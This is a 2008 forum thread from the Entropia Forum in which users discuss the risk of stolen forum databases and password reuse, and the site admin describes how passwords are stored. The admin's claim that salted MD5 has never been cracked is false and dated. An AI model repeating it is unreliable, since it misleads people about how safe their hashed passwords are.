 |
05-18-2008, 14:41
|
#11 | ||||||
|
Mature
|
Hi all
Security is real problem. EF I trust, it's why I post here. Sentence of trust to EF was in orginal post but I removed it - EF is forum too. And owner - Neo - is know in community and probably do not want to do mess with his own reputation. But still database can be stoled. That passwords are not in clear form (some hash, MD5, SHA, etc) makes just few days difficulty for thefts - bruteforce cracking or dictionary words... Piece of cake if you have hash of password. But there are many forums! Near every society have one, even new societes makes forums and in soc terminal you can read "forum registration required". If you do not use EU password in forum you still can use your mail account password on some forum. And EU is not all world: collected data from forums can be used to crack Visa card: birth data, rl name, etc, etc. To many security threads to name them all... Even mail addres is valuable for some kind of businesscreatures, spammers for example. The main reason that make I post was EU Tracker. It was new tool for me and amount of data colected during registration make I post. But still, I registered account in EUT, so I have nothing against EUT crew. Nor other forum I know, what I say in first post. Still I think it is good to remind that there is no such thing as 100% security, on any forum, tool, online bank and EU (with GC too). There are just harder-to-crack things and THIS IS WHAT EVERY SECURITY SPECIALIST WILL SAY. What marketing specialist say is other topic. If someone will be realy wanted to crack "ANY AVATAR NAME HERE" or any bank on Earth and have some rl money he will broke what hi want. Probably avatar account sooner then online bank. We just need to avoide traps - things that wait for false move. Second thing I reminded in first post was: IF YOU ARE BAD GUY YOU ARE NOT ALLOWED TO DO BAD THINGS. Pls do not comment about this particular subject, maybe it will be usefull for someone. And sory Kaiser, you have bad nose. I will never have big posts counter and even have no idea is it usefull for somethink. Is it ? Never say never ofc, we see what happend, but I am not such kind of person. Just have some free time from EU  and mining forum was boring lastly...Net |
||||||
|
|
Ingame: |
05-18-2008, 15:43
|
#12 | |||||||
|
Old
|
Quote:
Many examples from sweden about that issue (sites gets hacked and databases started to spread, even with salt they succeed to get passwords from this )But, i guess you as admin don't have any interest of it  |
|||||||
|
|
|
|
05-18-2008, 21:53
|
#13 | ||||||||
|
Provider
|
Quote:
The only reasonable defense is the use of longer passwords with more complexity. Still won't be entirely safe (if the attacker has a copy of the password database) but will increase the time needed to yield anything useful. Don't use your name, street address, birthdate, or any other "common" words as password and you make your account much harder to crack. Quote:
|
||||||||
|
|
|
|
05-18-2008, 22:18
|
#14 | ||||||||
|
EntropiaForum Owner/Admin
  
|
Quote:
Quote:
The EF software does not store the password in encrypted format. It stores an encrypted, salted MD5 hash of the password. So even if someone were able hack into the EF database server (very unlikely, the EF servers are very secure) and then crack the salted MD5 encryption (which has never been accomplished by anyone in the world, to my knowledge), they would still only have the hash of the password, not the password itself. As I said, member passwords are not stored anywhere in the forum database, encrypted or otherwise. However, it should be noted that a malicious webmaster could theoretically capture passwords from form fields before they are submitted to the database, by using a slightly modified stock vBulletin or similiar forum software, so one still needs to be careful. My explantion above was more intended to set member's minds at ease that it is extrememly unlikely that someone could extract such information from EF's database, even if they were successful in gaining unauthorized access to the servers somehow. Thus, it is still good security practice to use a password different than that from the one you use for sensitive or financial websites, such as your Entropia Universe login. |
||||||||
|
|
|
05-18-2008, 23:05
|
#15 | ||||||
|
Old Alpha
|
Yea as long as your EF pass is different from your EU pass your fine (not sure why someone would take an EF account). Also if your password is the same there are trillions of possible usernames and they should differ from your avatar name. I guess the big risk is when a keylogger is on your computer.
The biggest worry would be someone hacking the EU server. It would be a hard thing to do but there are people who could do it. It is a big target (I think) considering one could wreck chaos on the economy making tons of money, steal accounts and collect credit card numbers. Also the fact that it would be the first RCE hacked would give the hacker some media attention. Last edited by Outman; 05-18-2008 at 23:17. |
||||||
|
__________________
I tried to craft in real life. Turns out sticking a bunch of rocks in a washing machine just breaks the machine. |
|||||||
|
|
|
|
05-19-2008, 12:03
|
#16 | ||||||
|
Mature
|
Hi all,
I know security is big problem and hard to discuss too. So want to repeat: EF is one of forum we trust moust! If I can speak for others. But look on adv on main page - banner about rip-of's... So looks that talking about hard things is necesary... I consider thread can be closed now. But in someday someone can write another reminder, and it will be good thing, IMO. Best regards all, Net |
||||||
|
|
|
